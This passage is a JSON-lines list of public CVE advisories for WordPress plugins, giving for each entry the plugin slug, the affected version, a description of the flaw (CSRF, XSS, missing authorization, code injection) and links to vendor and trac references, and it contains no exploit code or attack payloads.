{"CVE_ID":"CVE-2022-4941","slug":"wc-multivendor-membership","versionImpact":"2.10.0","description":"The WCFM Membership plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.10.0 due to missing nonce checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying membership details, changing renewal information, controlling membership approvals, and more, via a forged request granted they can trick a site's administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632641%40wc-multivendor-membership&new=2632641%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632641%40wc-multivendor-membership&new=2632641%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3758db41-a3c5-436a-bb9a-5886f10d1519?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3758db41-a3c5-436a-bb9a-5886f10d1519?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2605020%40wc-multivendor-membership&new=2605020%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2605020%40wc-multivendor-membership&new=2605020%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2416","slug":"meeting-scheduler-by-vcita","versionImpact":"4.2.10","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to Cross-Site Request Forgery due to a missing nonce check on the vcita_logout_callback function in versions up to, and including, 4.2.10. This makes it possible for unauthenticated attackers to log out a vcita connected account, which would cause a denial of service on the appointment scheduler, via a forged request granted they can trick a site user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f434585c-8533-4788-b0bc-5650390c29a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f434585c-8533-4788-b0bc-5650390c29a8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-35098","slug":"wordpress-nextgen-galleryview","versionImpact":"0.5.5","description":"Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in John Brien WordPress NextGen GalleryView plugin <=\u00a00.5.5 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-nextgen-galleryview\\\/wordpress-wordpress-nextgen-galleryview-plugin-0-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wordpress-nextgen-galleryview\\\/wordpress-wordpress-nextgen-galleryview-plugin-0-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4938","slug":"woo-bulk-editor","versionImpact":"1.1.3.3","description":"The BEAR for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.1.3.3. This is due to a missing capability check on the woobe_bulkoperations_apply_default_combination function. This makes it possible for authenticated attackers (subscriber or higher) to manipulate products.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L286\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php#L286\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2970262\\\/woo-bulk-editor\\\/trunk\\\/ext\\\/bulkoperations\\\/bulkoperations.php?contextall=1&old=2844667&old_path=%2Fwoo-bulk-editor%2Ftrunk%2Fext%2Fbulkoperations%2Fbulkoperations.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c42f56a2-b9f9-40ef-86ad-fea6cf2e29f8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c42f56a2-b9f9-40ef-86ad-fea6cf2e29f8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0702","slug":"oliver-pos","versionImpact":"2.4.1.8","description":"The Oliver POS \u2013 A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions hooked via AJAX in the includes\/class-pos-bridge-install.php file in all versions up to, and including, 2.4.1.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several unauthorized actions like deactivating the plugin, disconnecting the subscription, syncing the status and more.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oliver-pos\\\/trunk\\\/includes\\\/class-pos-bridge-install.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oliver-pos\\\/trunk\\\/includes\\\/class-pos-bridge-install.php#L11\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5640","slug":"bdthemes-prime-slider-lite","versionImpact":"3.14.7","description":"The Prime Slider \u2013 Addons For Elementor (Revolution of a slider, Hero Slider, Ecommerce Slider) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 attribute within the Pacific widget in all versions up to, and including, 3.14.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9820b52b-540a-47e8-9e5f-274ef1720ffa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9820b52b-540a-47e8-9e5f-274ef1720ffa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-prime-slider-lite\\\/tags\\\/3.14.7\\\/modules\\\/pacific\\\/widgets\\\/pacific.php#L1462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-prime-slider-lite\\\/tags\\\/3.14.7\\\/modules\\\/pacific\\\/widgets\\\/pacific.php#L1462\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-prime-slider-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-prime-slider-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097891\\\/#file372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097891\\\/#file372\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4604","slug":"2j-slideshow","versionImpact":"1.3.54","description":"The Slideshow, Image Slider by 2J plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018post\u2019 parameter in versions up to, and including, 1.3.54 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3a9a1f1-566f-478e-a0b7-857c12f21ff7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3a9a1f1-566f-478e-a0b7-857c12f21ff7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/2j-slideshow\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/2j-slideshow\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9630","slug":"wps-telegram-chat","versionImpact":"4.6.0","description":"The WPS Telegram Chat plugin for WordPress is vulnerable to authorization bypass due to a missing capability check when accessing messages in versions up to, and including, 4.5.4. This makes it possible for unauthenticated attackers to view the messages that are sent through the Telegram Bot API.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b9b17f-f819-4316-8565-4e7603cd5de7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/86b9b17f-f819-4316-8565-4e7603cd5de7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wps-telegram-chat\\\/tags\\\/4.5.4\\\/public\\\/partials\\\/wps-telegram-chat-public-handler.php#L92\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wps-telegram-chat\\\/tags\\\/4.5.4\\\/public\\\/partials\\\/wps-telegram-chat-public-handler.php#L92\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11118","slug":"404-error-monitor","versionImpact":"1.1","description":"The 404 Error Monitor plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the updatePluginSettings() function. This makes it possible for unauthenticated attackers to make changes to plugin settings and clear up all the error logs via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ba7a54d-3497-4788-aa73-081d2c1015fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ba7a54d-3497-4788-aa73-081d2c1015fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/404-error-monitor\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/404-error-monitor\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404-error-monitor\\\/trunk\\\/index.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/404-error-monitor\\\/trunk\\\/index.php#L274\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0939","slug":"magicform","versionImpact":"1.6.2","description":"The MagicForm plugin for WordPress is vulnerable to access and modification of data due to a missing capability check on the plugin's AJAX actions in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to invoke those actions in order to delete or view logs, modify forms or modify plugin settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magicform\\\/trunk\\\/admin\\\/admin-menu.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/magicform\\\/trunk\\\/admin\\\/admin-menu.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa3497ae-7f3a-4e67-ad7a-77b50dccaf3b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa3497ae-7f3a-4e67-ad7a-77b50dccaf3b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13679","slug":"buybox-widget","versionImpact":"3.1.5","description":"The Widget BUY.BOX plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buybox-widget' shortcode in all versions up to, and including, 3.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buybox-widget\\\/trunk\\\/functions\\\/Widget\\\/Embed.php#L43\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/buybox-widget\\\/trunk\\\/functions\\\/Widget\\\/Embed.php#L43\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fba6abba-fe29-4a94-bf20-3db78737c275?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fba6abba-fe29-4a94-bf20-3db78737c275?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13890","slug":"allow-php-execute","versionImpact":"1.0","description":"The Allow PHP Execute plugin for WordPress is vulnerable to PHP Code Injection in all versions up to, and including, 1.0. This is due to allowing PHP code to be entered by all users for whom unfiltered HTML is allowed. This makes it possible for authenticated attackers, with Editor-level access and above, to inject PHP code into posts and pages.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allow-php-execute\\\/trunk\\\/allow-php-execute.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/allow-php-execute\\\/trunk\\\/allow-php-execute.php#L10\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412c39e9-9378-4c2c-817c-8d37f156af6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412c39e9-9378-4c2c-817c-8d37f156af6e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4595","slug":"fastspring","versionImpact":"3.0.1","description":"The FastSpring plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fastspring\/block-fastspringblocks-complete-product-catalog' block in all versions up to, and including, 3.0.1 due to insufficient input sanitization and output escaping on the 'color' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fastspring\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/fastspring\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e96d118a-e38c-4043-9550-5f5ab0d83dc7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e96d118a-e38c-4043-9550-5f5ab0d83dc7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5956","slug":"hrm","versionImpact":"2.2.17","description":"The WP Human Resource Management plugin for WordPress is vulnerable to Arbitrary User Deletion due to a missing authorization within the ajax_delete_employee() function in versions 2.0.0 through 2.2.17. The plugin\u2019s deletion handler reads the client-supplied $_POST['delete'] array and passes each ID directly to wp_delete_user() without verifying that the caller has the delete_users capability or limiting which user IDs may be removed. This makes it possible for authenticated attackers, with Employee-level access and above, to delete arbitrary accounts, including administrators.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hrm\\\/tags\\\/2.2.17\\\/class\\\/employee.php#L48\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hrm\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hrm\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28cf0f3f-0048-4da9-aa86-243479f7b974?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28cf0f3f-0048-4da9-aa86-243479f7b974?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8317","slug":"custom-word-cloud","versionImpact":"0.3","description":"The Custom Word Cloud plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018angle\u2019 parameter in all versions up to, and including, 0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/custom-word-cloud\\\/trunk\\\/custom-word-cloud.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/custom-word-cloud\\\/trunk\\\/custom-word-cloud.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-word-cloud\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/custom-word-cloud\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f153a0ce-c967-43ed-97be-901ea7dcd12b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f153a0ce-c967-43ed-97be-901ea7dcd12b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4940","slug":"wc-multivendor-membership","versionImpact":"2.10.0","description":"The WCFM Membership plugin for WordPress is vulnerable to unauthorized modification and access of data in versions up to, and including, 2.10.0 due to missing capability checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying membership details, changing renewal information, controlling membership approvals, and more.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632641%40wc-multivendor-membership&new=2632641%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2632641%40wc-multivendor-membership&new=2632641%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2605020%40wc-multivendor-membership&new=2605020%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2605020%40wc-multivendor-membership&new=2605020%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2633191%40wc-multivendor-membership&new=2633191%40wc-multivendor-membership&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c6577a2-6722-4d3b-958d-1143dca414cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9c6577a2-6722-4d3b-958d-1143dca414cd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2415","slug":"meeting-scheduler-by-vcita","versionImpact":"4.2.10","description":"The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_logout_callback function in versions up to, and including, 4.2.10. This makes it possible for authenticated attackers with minimal permissions, such as a subscriber, to log out a vcita connected account, which would cause a denial of service on the appointment scheduler.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/meeting-scheduler-by-vcita\\\/trunk\\\/vcita-ajax-function.php#L55\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"name\":\"https:\\\/\\\/blog.jonh.eu\\\/blog\\\/security-vulnerabilities-in-wordpress-plugins-by-vcita\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/731cbeed-d4aa-448f-878a-8c51a3da4e18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/731cbeed-d4aa-448f-878a-8c51a3da4e18?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5538","slug":"mpoperationlogs","versionImpact":"1.0.1","description":"The MpOperationLogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the IP Request Headers in versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc5f1b00-acee-4dc8-acd7-2d3f3493f253?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc5f1b00-acee-4dc8-acd7-2d3f3493f253?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mpoperationlogs\\\/trunk\\\/common.php#L10\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mpoperationlogs\\\/trunk\\\/common.php#L10\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mpoperationlogs\\\/trunk\\\/template\\\/ipslist_td.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mpoperationlogs\\\/trunk\\\/template\\\/ipslist_td.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/juweihuitao\\\/MpOperationLogs\\\/\",\"name\":\"https:\\\/\\\/github.com\\\/juweihuitao\\\/MpOperationLogs\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4970","slug":"pubydoc-data-tables-and-charts","versionImpact":"2.0.6","description":"The PubyDoc WordPress plugin through 2.0.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/845bbfdd-fe9f-487c-91a0-5fe10403d8a2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/845bbfdd-fe9f-487c-91a0-5fe10403d8a2\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0658","slug":"insert-php-code-snippet","versionImpact":"1.3.4","description":"The Insert PHP Code Snippet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the user's name when accessing the insert-php-code-snippet-manage page in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4a6b786-d0ef-41f6-b2bf-83307ec02b91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033503%40insert-php-code-snippet&new=3033503%40insert-php-code-snippet&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7085","slug":"scalable-vector-graphics-svg","versionImpact":"3.4","description":"The Scalable Vector Graphics (SVG) WordPress plugin through 3.4 does not sanitize uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2ec1308-75a0-49d0-9288-33c6d9ee4328\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2ec1308-75a0-49d0-9288-33c6d9ee4328\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5092","slug":"elegant-addons-for-elementor","versionImpact":"1.0.8","description":"The Elegant Addons for elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Switcher, Slider, and Iconbox widgets in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 